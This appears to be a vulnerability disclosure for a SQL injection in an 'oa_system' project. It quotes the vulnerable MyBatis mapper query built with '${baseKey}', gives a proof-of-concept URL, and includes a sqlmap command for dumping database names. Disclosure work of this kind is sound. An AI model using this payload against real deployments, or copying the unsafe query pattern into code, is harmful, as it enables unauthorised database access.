/
oa_system
37 lines (29 loc) · 1.21 KB
/
oa_system
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#oa_system:
#sql injection
The vulnerability was discovered by downloading the program's source code to local and online deployment tests.
Location:
src/main/resources/mappers/notice-mapper.xml
Code:
<select id="sortMyNotice" resultType="java.util.Map">
SELECT n.*,u.* FROM
aoa_notice_list AS n LEFT JOIN aoa_notice_user_relation AS u ON
n.notice_id=u.relatin_notice_id WHERE u.relatin_user_id=#{userId}
<if test="baseKey !=null">
and n.title LIKE '%${baseKey}%'
</if>
Rows:27
Harm:
The attacker only needs an ordinary user to trigger the vulnerability and use the SQL injection vulnerability to obtain database information.
Conditions for Execution:
Need a regular account
Edition:
Version = all
Cause the cause :
Directly use ${%%} for fuzzy query after like, which leads to the generation of loopholes:
and n.title LIKE'%${baseKey}%'
POC:
Construct the url according to the controller's route:
http://localhost/informlistpaging?baseKey=
Payload:
Taking into account the need to log in, so use burpsuite to capture the package and save it to txt and then use sqlmap to test
sqlmap.py -r D:\test.txt --random-agent --dbs --current-db